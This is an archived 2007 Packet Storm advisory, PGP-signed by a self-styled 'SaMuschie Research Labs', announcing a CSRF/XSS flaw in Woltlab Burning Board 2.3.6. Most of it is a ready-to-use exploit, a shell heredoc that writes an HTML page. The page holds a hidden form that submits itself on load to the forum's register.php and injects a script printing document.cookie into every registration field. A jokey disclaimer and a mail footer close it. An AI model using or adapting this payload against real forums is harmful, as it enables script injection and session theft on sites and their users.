woltlab236-xss.txt

2007-03-06T00:00:00
ID PACKETSTORM:54847
Type packetstorm
Reporter Samenspender
Modified 2007-03-06T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
+--------------------------------------- - -- -  
| SaMuschie Research Labs proudly presents . . .  
+------------------------------------------- -- - -   
| Application: Woltlab Burning Board (wbb)  
| Version: 2.3.6 (others not testet)  
| Vuln./Exploit Type: CSRF/XSS  
| Status: 0day  
+----------------------------------------- -- - -   
| Discovered by: Samenspender  
| Released: 20070302  
| SaMuschie Release Number: 5  
+------------------------------- - -- -  
  
CSRF/XSS Exploit:  
  
cat <<EOF > wetpussy.html  
<form name='evilform' method='POST' action='http://victimhost/wbb2/register.php'>  
<input type=hidden name=r_username value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_email value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_password value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=key_string value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=key_number value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_homepage value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_icq value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_aim value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_yim value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_msn value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_day value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_month value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_year value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_gender value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_signature value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disablesmilies value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disablebbcode value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=disableimages value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usertext value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_invisible value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usecookies value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_receivepm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showavatars value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_showimages value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_daysprune value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_threadview value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_dateformat value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_timeformat value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_startweek value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_styleid value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=r_langid value='"><script>alert("Cookie: " +  
document.cookie)</script><lol="'>  
<input type=hidden name=send value='send'>  
<input type=hidden name=sid value=''>  
<input type=hidden name=disclaimer value='viewed'>  
</form>  
<body onload=javascript:document.forms['evilform'].submit();>  
EOF  
  
+----------------------------- -- -  
| Lameness Disclaimer  
+------------------------------------- - -- - -   
| SaMuschie Research Labs was founded to publish  
| vulnerabilities within well known software products,  
| which are easy to discover and exploit.  
|   
| SaMuschie researchers just spend a minimum of time  
| and knowledge for each vulnerability. Hence readers of  
| this advisory are requested not to ask any questions  
| to the researchers.... they don't know the answer ;)  
+---------------------------------- - -- - -  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD  
Qg6at+bMTnvHbw0SYyXk5ko=  
=7wPg  
-----END PGP SIGNATURE-----  
  
  
  
  
  
  
___________________________________________________________   
Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de  
`